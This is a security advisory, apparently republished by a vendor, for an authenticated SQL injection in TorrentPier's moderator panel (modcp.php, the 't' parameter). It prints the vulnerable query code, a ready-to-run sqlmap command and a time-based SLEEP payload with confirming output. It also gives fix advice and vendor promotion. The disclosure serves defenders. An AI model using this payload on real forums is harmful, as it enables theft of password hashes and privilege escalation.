GHSA-4rwr-8c3m-55f6
HIGHTorrentPier is Vulnerable to Authenticated SQL Injection through Moderator Control Panel's topic_id parameter
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
torrentpier/torrentpierReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
An authenticated SQL injection vulnerability exists in the moderator control panel (modcp.php). Users with moderator permissions can exploit this vulnerability by supplying a malicious topic_id (t) parameter. This allows an authenticated moderator to execute arbitrary SQL queries, leading to the potential disclosure, modification, or deletion of any data in the database.
Details
The vulnerability is triggered when modcp.php processes a request that includes a topic_id (t parameter). The value of $topic_id is taken directly from user input and is not sanitized or parameterized before being concatenated into an SQL query.
This occurs within the initial data retrieval block for a given topic ID.
Vulnerable Code Block in modcp.php (lines 111-122):
if ($topic_id) {
$sql = "
SELECT
f.forum_id, f.forum_name, f.forum_topics, f.self_moderated,
t.topic_first_post_id, t.topic_poster
FROM " . BB_TOPICS . " t, " . BB_FORUMS . " f
WHERE t.topic_id = $topic_id
AND f.forum_id = t.forum_id
LIMIT 1
";
if (!$topic_row = DB()->fetch_row($sql)) {
bb_die($lang['INVALID_TOPIC_ID_DB']);
}
// ...
}
In the WHERE t.topic_id = $topic_id clause, the $topic_id variable is directly embedded into the query string. An attacker can inject SQL syntax (e.g., boolean logic, time-based functions) into the t parameter to manipulate the query's execution.
PoC
This is a time-based blind SQL injection vulnerability that requires moderator privileges.
Prerequisites:
- A running instance of TorrentPier.
- An account with moderator permissions.
Steps to Reproduce:
- Log in as a moderator.
- Obtain your full session cookie string from your browser's developer tools.
- Use
sqlmapto automate the exploitation. The tool will test thetparameter for vulnerabilities.
sqlmap Command:
(Note: Replace https://localhost with the target URL and "your_full_cookie_string" with the actual cookie data from your browser session, e.g., "key1=value1; key2=value2").
sqlmap -u "https://localhost/modcp.php?mode=lock&t=1" -p t --cookie "your_full_cookie_string" --dbms mysql --technique T --current-db
sqlmap Output Confirmation:
The following output from sqlmap confirms successful exploitation:
---
Parameter: t (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: mode=lock&t=1 AND (SELECT 9461 FROM (SELECT(SLEEP(5)))KxhM)
---
[INFO] the back-end DBMS is MySQL
[INFO] fetching current database
[INFO] retrieved: torrentpier
current database: 'torrentpier'
Impact
This is an authenticated SQL Injection vulnerability. Although it requires moderator privileges, it is still severe. A malicious or compromised moderator account can leverage this vulnerability to:
- Read sensitive data: Extract any information from the database, including user credentials (password hashes), private messages, email addresses, and other private data.
- Modify data: Alter records in the database, such as elevating their own or other users' privileges to administrator level.
- Delete data: Corrupt or destroy forum data by dropping tables or deleting records.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | torrentpier/torrentpier | all versions | 2.8.9 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for torrentpier/torrentpier. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update torrentpier/torrentpier to 2.8.9 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4rwr-8c3m-55f6 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4rwr-8c3m-55f6 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4rwr-8c3m-55f6. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4rwr-8c3m-55f6 in your dependencies?
O3 detects GHSA-4rwr-8c3m-55f6 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.